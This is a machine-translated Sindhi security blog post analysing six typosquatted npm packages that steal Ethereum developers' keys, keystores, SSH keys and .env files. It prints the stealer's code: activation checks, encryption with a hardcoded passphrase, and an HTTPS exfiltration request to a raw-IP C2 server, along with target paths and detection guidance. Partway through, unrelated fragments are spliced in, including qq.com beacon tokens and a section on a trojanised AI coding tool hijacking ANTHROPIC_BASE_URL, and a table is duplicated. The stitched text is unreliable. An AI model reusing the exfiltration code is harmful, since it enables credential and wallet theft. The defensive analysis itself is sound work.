TL، ڊاڪٽر
6 مئي 2026 تي، هڪ اين پي ايم پبلشر، namikazesarada010206، ايٿيريم، سوليڊٽي، ۽ ڊي فائي ڊولپر ايڪو سسٽم کي نشانو بڻائيندڙ ڇهه خراب پيڪيجز کي اڳتي وڌايو.
پيڪيجز، viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils، ۽ web3-utils-core، مشهور ويب 3 ٽولنگ لاءِ مددگار لائبريرين وانگر ڏسڻ لاءِ ٺهيل قابل قبول نالا استعمال ڪيا ويا.
سڀني ڇهن پيڪيجز ۾ ساڳيو مواد شامل هو telemetry.js فائل. فائل ڪلسٽر ۾ بائيٽ جي برابر هئي، SHA-256 سان:
مالويئر انسٽاليشن وقت تي عمل نٿو ڪري. ڪو به ناهي preinstall or postinstall ٿلهو. ان جي بدران، اهو چالو ٿئي ٿو جڏهن پيڪيج ذريعي درآمد ڪيو ويندو آهي require().
اها تفصيل اهم آهي.
امپلانٽ انتظار ڪري ٿو جيستائين ڪو ڊولپر اصل ۾ پيڪيج استعمال نه ڪري. پوءِ اهو چيڪ ڪري ٿو ته ڇا ورڪ اسٽيشن هڪ حقيقي ايٿيريم / سوليڊٽي ڊولپمينٽ ماحول وانگر نظر اچي ٿو. اهو ڪيميا يا انفورا ڪيز، پرائيويٽ ڪيز، يادگيريون، ڊيپلائيئر ڪيز، يا مقامي فاؤنڊيري ڊاريڪٽري ڳولي ٿو.
جيڪڏهن هوسٽ ميچ ڪري ٿو، ته چوري ڪندڙ SSH پرائيويٽ ڪيز، فاؤنڊيري / گيٿ / براوني والٽ ڪي اسٽور گڏ ڪري ٿو، .env* فائلون، ۽ حساس ماحولي متغير. اهو هارڊ ڪوڊ ٿيل پاسفريز استعمال ڪندي AES-256-GCM سان بنڊل کي انڪرپٽ ڪري ٿو ۽ ان کي TLS تصديق کي غير فعال ڪري هڪ خام IPv4 C2 اينڊ پوائنٽ تي ايڪسفلٽر ڪري ٿو.
زائيگيني جي مالويئر ارلي وارننگ (MEW) سسٽم سڀني ڇهن پيڪيجز کي نقصانڪار قرار ڏنو. اين پي ايم رجسٽري ٽيڪ ڊائون رپورٽ بنڊل التوا ۾ آهي.
ڪلسٽر: ڇهه پيڪيجز، هڪ پبلشر
پبلشر اڪائونٽ namikazesarada010206 غير تصديق ٿيل جي ميل ايڊريس سان ڳنڍيل هو namikazesarada010206@gmail.com.
هي مهم 6 مئي 2026 تي هڪ ڏينهن جي اشاعت جي طور تي ظاهر ٿي. سڀني ڇهن پيڪيجز کي ورجن ڪيو ويو جيئن 1.0.0، صفر رن ٽائيم انحصار هئا، ۽ صرف ٽي فائلون موڪليون ويون:
package.json index.js telemetry.js انهن ساڳئي سورس ريپوزٽري جو اعلان پڻ ڪيو:
https://github.com/harunosakura030303-maker/evmchain-config پهرين اشاعت تي پهرين ٽي پيڪيجز MEW اسڪينرز پاران پڪڙيا ويا. باقي ٽي پبلشر جي npm پروفائل جي تجزيه نگار جي جائزي کان پوءِ زبردستي پرچم ڪيا ويا. هڪ ڀيرو ساڳي بائيٽ-هڪجهڙائي telemetry.js ڪلسٽر ۾ تصديق ڪئي وئي، انهن کي مستقل مزاجي جي ڪري نقصانڪار طور بند ڪيو ويو.
| پئڪيج | نسخو | npm شايع ٿيل | MEW ٽڪيٽ | فرمايائون |
|---|---|---|---|---|
| ويم-ڪور | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | گندو |
| ويم-يوٽيلز-ڪور | 1.0.0 | 2026-05-06 | #51050 | گندو |
| هارڊ هيٽ-ڪور-يوٽيلز | 1.0.0 | 2026-05-06 | #51051 | گندو |
| اي وي ايم-يوٽيلز | 1.0.0 | 2026-05-06 | #51069 | بدڪار، مستقل مزاجي سان |
| فاؤنڊري-يوٽيلز | 1.0.0 | 2026-05-06 | #51071 | بدڪار، مستقل مزاجي سان |
| ويب 3-يوٽيلز-ڪور | 1.0.0 | 2026-05-06 | #51070 | بدڪار، مستقل مزاجي سان |
نالو ڏيڻ جي حڪمت عملي سڌي پر اثرائتي آهي.
اهي پيڪيجز بلڪل اپ اسٽريم نالن جي نقل نٿا ڪن. ان جي بدران، اهي ممڪن "افاديت" لاحقا استعمال ڪن ٿا جهڙوڪ -core, -utils، ۽ -utils-core. اهو انهن کي ساٿي لائبريرين وانگر نظر اچي ٿو جيڪي هڪ ڊولپر شايد Web3 ٽولنگ جي ويجهو ڏسڻ جي اميد رکي سگهي ٿو.
| خراب پيڪيج | جائز هدف |
|---|---|
| ويم-ڪور | ويم، هڪ مشهور ايٿيريم ٽائپ اسڪرپٽ ڪلائنٽ |
| ويم-يوٽيلز-ڪور | ويم |
| هارڊ هيٽ-ڪور-يوٽيلز | هارڊ هيٽ، هڪ مکيه وهڪرو سوليڊٽي ڊولپمينٽ ماحول |
| اي وي ايم-يوٽيلز | عام EVM ٽولنگ نيم اسپيس |
| فاؤنڊري-يوٽيلز | فاؤنڊيري، هڪ سوليڊٽي ٽول چين |
| ويب 3-يوٽيلز-ڪور | web3-utils، Web3.js مددگار |
هي "اضافي پيڪيج" جو نمونو آهي: نه ته "مان حقيقي پيڪيج آهيان،" پر "مان حقيقي پيڪيج جي چوڌاري هڪ معقول مددگار وانگر نظر اچان ٿو."
ڊي فائي ڊولپرز لاءِ تيزي سان اڳتي وڌڻ، اهو خطرو پيدا ڪرڻ لاءِ ڪافي آهي.
جڏهن پيڪيج درآمد ڪيو ويندو آهي ته ڇا ٿيندو آهي
حملي جو سلسلو ننڍڙو، ڄاڻي ٻجهي، ۽ ڪرپٽو-ترقي جي ماحول تي مرکوز آهي.
ڪو به انسٽاليشن ٿلهو ناهي. ان جي بدران، هر پيڪيج ۾ هڪ شامل آهي index.js جيڪو اسٽب ڪارڪردگي کي برآمد ڪري ٿو ۽ پوءِ خراب ٽيلي ميٽري ماڊل لوڊ ڪري ٿو.
require('./telemetry').init(); ان جو مطلب آهي ته مالويئر پهرين درآمد تي چالو ٿي ويندو آهي.
اهو حملي آور لاءِ عملي طور تي مفيد آهي. ڪيترائي اسڪينر ۽ سينڊ باڪس انسٽال-ٽائيم رويي تي ڌيان ڏين ٿا. هي پيڪيج انتظار ڪري ٿو جيستائين اهو اصل ۾ ڊولپر، بلڊ اسڪرپٽ، ٽيسٽ سوٽ، يا رن ٽائم رستو پاران استعمال نه ٿئي.
ايڪٽيويشن گيٽ: صرف حقيقي ويب 3 ڊولپر ورڪ اسٽيشنن تي فائر
امپلانٽ جو سڀ کان اهم حصو ايڪٽيويشن گيٽ آهي.
مالويئر ماحولياتي متغيرن جي جانچ ڪري ٿو جيڪي عام طور تي ايٿيريم / سوليڊٽي ڊولپر مشينن تي ملن ٿا:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); اهو پڻ چيڪ ڪري ٿو ته ڇا فاؤنڊيري انسٽال ٿيل نظر اچي ٿي:
fs.existsSync(path.join(os.homedir(), '.foundry')) جيڪڏهن ڪا به شرط صحيح نه آهي، ته فنڪشن واپس اچي ٿو ۽ ڪجهه به نٿو ڪري.
اهو عام تجزياتي ماحول ۾ پيڪيج کي وڌيڪ خاموش بڻائي ٿو. فاؤنڊيري، ڪيميا ڪيز، انفورا ڪيز، پرائيويٽ ڪيز، يا يادگيري کان سواءِ هڪ سينڊ باڪس هڪ بي ضرر نظر ايندڙ درآمد ڏسي سگهي ٿو.
هڪ ملندڙ هوسٽ تي، مالويئر گڏ ڪرڻ کان اڳ 60 کان 90 سيڪنڊ انتظار ڪري ٿو:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); دير درآمد ۽ خارج ٿيڻ جي وچ ۾ واضح لاڳاپو گھٽائي ٿي. .unref() ڪال پڻ ميزبان جي عمل کي عام طور تي نڪرڻ جي اجازت ڏئي ٿي جيڪڏهن پيڪيج مختصر مدت جي اسڪرپٽ ۾ درآمد ڪيو ويو هجي.
هي شور مچائيندڙ ۽ قبضو ڪرڻ وارو رويو ناهي. اهو هڪ ٽارگيٽڊ چور آهي جيڪو ڊوڙڻ کان بچڻ لاءِ ٺاهيو ويو آهي جيستائين ڊولپر ماحول چوري ڪرڻ جي لائق نه هجي.
چور ڇا گڏ ڪري ٿو
هڪ ڀيرو ايڪٽيويشن گيٽ گذري ويندو آهي، مالويئر انهن ذريعن کان گڏ ڪندو آهي جيڪي Web3 ڊولپمينٽ ۾ سڀ کان وڌيڪ اهم آهن: پرائيويٽ ڪيز، والٽ ڪي اسٽورز، ڊيپلائيمينٽ سندون، ڪلائوڊ راز، اين پي ايم ٽوڪن، ۽ مقامي پروجيڪٽ ڪنفيگريشن.
| ذريعو | ڇا گڏ ڪيو ويو آهي |
|---|---|
| پروسيس.اين وي | ڪو به متغير ملندڙ /ٽوڪن|سيڪريٽ|ڪي|پاس|تصديق|نجي|ٻج|ميمونيمونڪ|AWS|NPM|تعمير/i |
| ~/.ssh/* | فائلون جن ۾ PRIVATE KEY يا BEGIN OPENSH شامل آهن، مڪمل فائل مواد سميت. |
| ~/.فائونڊري/ڪي اسٽورز/* | فاؤنڊيري والٽ ڪي اسٽور فائلون |
| ~/.ethereum/ڪي اسٽور/* | گيٿ والٽ ڪي اسٽور فائلون |
| ~/.براؤني/اڪائونٽس/* | براؤني والٽ ڪي اسٽور فائلون |
| ${cwd}/.env | مڪمل فائل مواد |
| ${cwd}/.env.local | مڪمل فائل مواد |
| ${cwd}/.env.پيداوار | مڪمل فائل مواد |
| ${cwd}/.env.ڊولپمينٽ | مڪمل فائل مواد |
| او ايس. هوسٽ نالو () | هوسٽ ميٽا ڊيٽا |
| ڪرپٽو.بي ترتيب يو يو آءِ ڊي() | متاثر/سيشن جي سڃاڻپ ڪندڙ |
| تاريخ. هاڻي () | ڪليڪشن ٽائيم اسٽيمپ |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA ٽوڪن آهن:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 اسان تصديق نه ڪري سگهيا آهيون ته ٽيلي ميٽري آپريٽر جي پنهنجي اينالائيٽڪس هئي يا الڳ الڳ مانيٽائيزڊ چينل. اسان جي جانچ ڪيل ٻنهي نمونن ۾ ATTA ٽوڪن ساڳيا آهن.
ڪلسٽر بي: هيبائي
claude.hk OAuth فشنگ + ANTHROPIC_BASE_URL اغوا
پهرين اپريل جو نمونو مهم جو وڌيڪ خراب، اڳوڻو هٿ آهي.
heibai:2.1.88-claude.hk-4 پاران شايع ڪيو ويو wuguoqiangvip28، هڪ اڪائونٽ 7 جون 2025 تي ٺاهيو ويو. پيڪيج واضح طور تي پاڻ کي جائز جي خلاف ورزي ڪيو 2.1.88 اينٿروپڪ رليز.
اهو CA-cert MITM سان پريشان نٿو ٿئي. ان جي بدران، اهو OAuth اينڊ پوائنٽ بابت استعمال ڪندڙ کي ڪوڙ ڳالهائي ٿو.
ليڪ ٿيل ڪلاڊ ڪوڊ سورس جي مٿان خراب اضافو شامل آهن:
| ذريعو | ڇا گڏ ڪيو ويو آهي |
|---|---|
| پروسيس.اين وي | ڪو به متغير ملندڙ /ٽوڪن|سيڪريٽ|ڪي|پاس|تصديق|نجي|ٻج|ميمونيمونڪ|AWS|NPM|تعمير/i |
| ~/.ssh/* | فائلون جن ۾ PRIVATE KEY يا BEGIN OPENSH شامل آهن، مڪمل فائل مواد سميت. |
| ~/.فائونڊري/ڪي اسٽورز/* | فاؤنڊيري والٽ ڪي اسٽور فائلون |
| ~/.ethereum/ڪي اسٽور/* | گيٿ والٽ ڪي اسٽور فائلون |
| ~/.براؤني/اڪائونٽس/* | براؤني والٽ ڪي اسٽور فائلون |
| ${cwd}/.env | مڪمل فائل مواد |
| ${cwd}/.env.local | مڪمل فائل مواد |
| ${cwd}/.env.پيداوار | مڪمل فائل مواد |
| ${cwd}/.env.ڊولپمينٽ | مڪمل فائل مواد |
| او ايس. هوسٽ نالو () | هوسٽ ميٽا ڊيٽا |
| ڪرپٽو.بي ترتيب يو يو آءِ ڊي() | متاثر/سيشن جي سڃاڻپ ڪندڙ |
| تاريخ. هاڻي () | ڪليڪشن ٽائيم اسٽيمپ |
ٽارگيٽ لسٽ انتهائي مخصوص آهي. هي عام برائوزر چوري يا وسيع سند اسڪريپنگ ناهي. اهو ڊولپرز لاءِ آهي جيڪي ايٿيريم ايپليڪيشنون ٺاهيندا، جانچندا، ترتيب ڏيندا، يا هلائيندا آهن.
فاؤنڊيري، گيٿ، ۽ براوني ڪي اسٽورز جي شموليت خاص طور تي اهم آهي. اهي فائلون والٽس يا ڊيپلائيمينٽ سڃاڻپ تائين سڌي رسائي جي نمائندگي ڪري سگهن ٿيون. جيڪڏهن حملو ڪندڙ انهن کي پاسورڊ، يادگيريون، يا ماحولياتي رازن سان جوڙي سگهي ٿو، ته اهي فنڊ منتقل ڪرڻ، ڊيپلائيرز جي نقل ڪرڻ، يا سمارٽ ڪانٽريڪٽ آپريشنز کي سمجهوتو ڪرڻ جي قابل ٿي سگهن ٿا.
خارج ڪرڻ کان اڳ انڪرپشن
مالويئر گڏ ڪيل ڊيٽا کي موڪلڻ کان اڳ ان کي انڪرپٽ ڪري ٿو.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); هارڊ ڪوڊ ٿيل پاسفريس آهي:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d آخري پيل لوڊ JSON جي طور تي لپيٽيو ويو آهي:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} انڪرپشن پاڻ ۾ مالويئر کي وڌيڪ ترقي يافته نٿو بڻائي. بهرحال، اهو نيٽ ورڪ جي چڪاس کي وڌيڪ ڏکيو بڻائي ٿو. هڪ محافظ جيڪو ٻاهر نڪرڻ کي ڏسي رهيو آهي اهو هڪ JSON پيل لوڊ ڏسندو، پر چوري ٿيل چاٻيون، والٽ فائلون، يا نه. .env هارڊ ڪوڊ ٿيل پاسفريز ۽ ڊيڪرپشن منطق کان سواءِ مواد.
خام IPv4 C2 ڏانهن ايڪسفلٽريشن
خارج ڪرڻ جو رستو هارڊ ڪوڊ ٿيل آهي:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); مالويئر ڊيٽا موڪلي ٿو:
https://76.13.37.80:8443/api/v1/telemetry ٻه تفصيل نمايان آهن.
پهرين، C2 ڊومين جي بدران هڪ خام IPv4 پتو آهي. اهو ڊومين رجسٽريشن جي ضرورت کي ختم ڪري ٿو ۽ ڪجهه ڊومين تي ٻڌل ڳولا کان بچي ٿو.
ٻيو، TLS تصديق بند ٿيل آهي:
rejectUnauthorized: false اهو مالويئر کي ڪنهن به سرٽيفڪيٽ کي قبول ڪرڻ جي اجازت ڏئي ٿو، جنهن ۾ خود دستخط ٿيل سرٽيفڪيٽ به شامل آهن. ٻين لفظن ۾، حملو ڪندڙ کي صحيح عوامي سرٽيفڪيٽ جي ضرورت کان سواءِ انڪرپٽ ٿيل ٽرانسپورٽ ملي ٿي.
ڪو به ٻيهر ڪوشش منطق ناهي ۽ ڪو به فال بيڪ هوسٽ ناهي. غلطيون خاموشي سان نگلي وينديون آهن. جيڪڏهن C2 آف لائن آهي يا پهچ کان ٻاهر آهي ته اهو پيڪيج کي خاموش رکي ٿو.
هي مهم ڇو اهم آهي
گھڻا خراب npm پيڪيجز جيڪي ڊولپرز لاءِ ٺهيل آهن وسيع سندون ڳوليندا آهن: npm ٽوڪن، AWS ڪيز، GitHub ٽوڪن، يا .npmrc فائلون.
هي مهم مقصد کي گهٽائي ٿي.
اهو نشانين جي ڳولا ڪري ٿو ته مشين ڪنهن ايٿيريم يا سوليڊٽي ڊولپر جي آهي. پوءِ اهو بلڪل انهن اثاثن کي ڇڪيندو آهي جيڪي ان ماحول ۾ اهم آهن: والٽ ڪي اسٽور، پرائيويٽ ڪيز، نيومونڪس، ڊيپلائيئر ڪيز، .env فائلون، ۽ SSH ڪيز.
اهو مهم کي ويب 3 ٽيمن لاءِ عام اين پي ايم چوري ڪندڙ کان وڌيڪ خطرناڪ بڻائي ٿو.
هڪ ڪامياب انفيڪشن ظاهر ڪري سگهي ٿو:
- ڊيپلائيمينٽ والٽس
- سمارٽ ڪانٽريڪٽ ايڊمن ڪيز
- آر پي سي فراهم ڪندڙ ڪيز
- ڪلائوڊ ڊپلائيمينٽ سندون
- اين پي ايم پبلشنگ ٽوڪن
- ڊولپر يا بلڊ انفراسٽرڪچر تائين SSH رسائي
- منصوبي جا راز محفوظ ڪيا ويا آهن
.envفائلون - فاؤنڊيري، گيٿ، يا براوني لاءِ والٽ ڪي اسٽور
پيڪيج جا نالا پڻ واضح سماجي انجنيئرنگ ڏيکارين ٿا. اهي واقف اوزار نالن ذريعي ويب 3 ڊولپر ايڪو سسٽم کي نشانو بڻائين ٿا: viem, hardhat, foundry, evm، ۽ web3.
اداڪار کي حقيقي منصوبن سان سمجهوتو ڪرڻ جي ضرورت ناهي. انهن کي صرف هڪ ڊولپر جي ضرورت آهي جيڪو انسٽال ڪري جيڪو هڪ مناسب ساٿي پيڪيج وانگر نظر اچي.
سمجهوتو ۽ ڳولا جا اشارا
| پيڪيجز ۽ پبلشر | |
|---|---|
| جو ميدان | قدر |
| اين پي ايم پبلشر | نميڪازيسردا010206 |
| پبلشر جو اي ميل | نميڪازيسردا010206@gmail.com |
| اي ميل تصديق ٿيل | نه |
| SCM تصديق ٿيل | نه |
| شهرت جو اسڪور | 1.0 |
| پيڪيجز | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| ورژن | سڀ 1.0.0 |
| ماخذ مخزن | https://github.com/harunosakura030303-maker/evmchain-config |
| تصديق ٿيل خرابي | سڀئي ڇهه پيڪيجز |
| نيٽ ورڪ | |
|---|---|
| قسم | قدر |
| سي 2 اينڊ پوائنٽ | https://76.13.37.80:8443/api/v1/telemetry |
| سي 2 آءِ پي | 76.13.37.80 |
| سي 2 پورٽ | 8443/ٽي سي پي |
| TLS رويي | رد ڪريو غير مجاز: غلط |
| پيل لوڊ اسڪيما | {"v":2,"iv": "ڊي": "ٽي": } |
| فائلون ۽ هيشز | |
|---|---|
| قسم | قدر |
| ٽيلي ميٽري.جي ايس ايس ايڇ اي-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| پيڪيج لي آئوٽ | package.json، index.js، telemetry.js |
| فائلن جو تعداد | 3 |
| تقريبن ڪل سائيز | 3.4 خيربخش |
چالو ڪرڻ جا سگنل
مالويئر انهن ماحولياتي متغيرن جي جانچ ڪري ٿو:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY اهو پڻ چيڪ ڪري ٿو:
~/.foundry/ ھدف ٿيل ھوسٽ رستا
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development ڪليڪشن ريجيڪس
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i ڳولا جا نوٽس
ڪيترائي قاعدا هن مهم کي مڪمل رويي جي تجزيي جي ضرورت کان سواءِ پڪڙيندا آهن.
پهرين، ڇهن خراب پيڪيج نالن لاءِ لاڪ فائلن کي اسڪين ڪريو:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core ڪو به ميچ ان ۾ package-lock.json, yarn.lock, pnpm-lock.yaml، يا node_modules تاريخ کي هڪ سنگين واقعي جي طور تي سمجهيو وڃي.
ٻيو، والٽ ڪي اسٽور رستا پڙهڻ لاءِ Node.js عملن جي نگراني ڪريو:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ هي مددگار انحصار جي طور تي درآمد ٿيل پيڪيج لاءِ گهٽ ۾ گهٽ جائز رويي آهي. اهو خاص طور تي مشڪوڪ آهي جڏهن آئوٽ بائونڊ نيٽ ورڪ سرگرمي کان پوءِ.
ٽيون، HTTPS ڪنيڪشن تي بلاڪ يا الرٽ ڪريو:
76.13.37.80:8443 خاص طور تي جڏهن درخواست جو رستو آهي:
/api/v1/telemetry چوٿون، اين پي ايم پيڪيجز جي ڳولا ڪريو جيڪي انهن خاصيتن کي گڏ ڪن ٿا:
- تازو يا گهٽ شهرت وارو پبلشر
- غير تصديق ٿيل جي ميل اڪائونٽ
- ويب 3 سان لاڳاپيل پيڪيج جو نالو
- ڪابه معنيٰ خيز ذخيري جي تاريخ ناهي
- ننڍو پئڪيج لي آئوٽ
index.jsجيڪو ٽيلي ميٽري يا مددگار فائل لوڊ ڪري ٿو- ڪابه رن ٽائم انحصار ناهي
- حساس ماحول-متغير مجموعو
- والٽ ڪي اسٽور تائين رسائي
هي نمونو هڪ واحد IOC کان وڌيڪ ڪارآمد آهي ڇاڪاڻ ته ايندڙ پيڪيج IP پتو تبديل ڪري سگهي ٿو پر ساڳيو ٽارگيٽنگ منطق رکي ٿو.
سمجهوتي جي جواب جي چيڪ لسٽ
جيڪڏهن ڪو ڊولپر ڇهن پيڪيجز مان هڪ استعمال ڪيو ۽ انهن جو ماحول ايڪٽيويشن گيٽ سان ملي ٿو، ته پوءِ ورڪ اسٽيشن کي سمجهوتو ٿيل سمجهيو.
ان ۾ فاؤنڊيري نصب ٿيل مشينون، ماحول ۾ ڪيميا يا انفورا ڪيز، پرائيويٽ ڪيز، يادگيريون، يا ڊيپلائيئر ڪيز شامل آهن.
تجويز ڪيل جواب:
- هوسٽ کي نيٽ ورڪ کان ڌار ڪريو.
- محفوظ ڪريو
node_modules، لاڪ فائلون، شيل جي تاريخ، ۽ فارنزڪس لاءِ لاڳاپيل لاگ. - هر SSH ڪيپيئر کي هيٺ گھمايو
~/.ssh/. - هر ڪي اسٽور لاءِ والٽ ڪيز کي هيٺ ڏنل گھمايو
~/.foundry,~/.ethereum، ۽~/.brownie. - فنڊز کي نون والٽس ۾ منتقل ڪريو.
- هر راز کي محفوظ ڪيو گھمايو
.env*ڊولپر ڪم ڪندڙ ريپوزٽريز ۾ فائلون. - ڪليڪشن ريجيڪس سان ملندڙ ماحولياتي رازن کي گھمايو، جنهن ۾ AWS ڪيز، اين پي ايم ٽوڪن، ڊيپلائي ٽوڪن، API ڪيز، پرائيويٽ ڪيز، سيڊز، ۽ ميمونڪس شامل آهن.
- پيڪيج جي پهرين انسٽال ٿيڻ کان وٺي آڊٽ ڪلائوڊ، اين پي ايم، گٽ هب، آر پي سي فراهم ڪندڙ، ۽ بلاڪچين سرگرمي.
- ٻيهر استعمال ڪرڻ کان اڳ ورڪ اسٽيشن جي تصوير ٻيهر ڪڍو.
محافظن کي ڇا کڻي وڃڻ گهرجي
هي مهم ڏيکاري ٿي ته ڪيئن npm ٽائيپوسڪوئٽنگ اعليٰ قدر واري ڊولپر ايڪو سسٽم جي چوڌاري ترقي ڪري رهي آهي.
اداڪار کي مسلسل ڪوشش جي ضرورت نه هئي. انهن کي ابهام جي ضرورت نه هئي. انهن کي انسٽاليشن جي وقت جي عمل جي به ضرورت نه هئي.
ان جي بدران، انهن ٽن شين تي ڀروسو ڪيو:
- ممڪن ويب 3 پيڪيج جا نالا
- صرف حقيقي ڪرپٽو-ترقي مشينن تي چالو ڪرڻ
- ايٿيريم ڊولپرز لاءِ سڀ کان وڌيڪ اهم فائلن ۽ رازن جي سڌي چوري
اهو مهم کي وسيع اسڪيننگ ۾ گم ڪرڻ آسان بڻائي ٿو ۽ جڏهن اهو صحيح ماحول ۾ لهي ٿو ته اهو خطرناڪ آهي.
ويب 3 ٽيمن لاءِ، سبق واضح آهي: انحصار جي نالن کي پنهنجي خطري جي ماڊل جي حصي طور سمجهو. هڪ پيڪيج جيڪو هڪ بي ضرر مددگار وانگر نظر اچي ٿو، اڃا تائين والٽ سمجهوتي جو مختصر ترين رستو بڻجي سگهي ٿو.
اين پي ايم رجسٽري کي رپورٽ ڪئي وئي. جڏهن پبلشر اڪائونٽ ۽ پيڪيجز هٽايا ويندا ته اسان هن پوسٽ کي اپڊيٽ ڪنداسين.




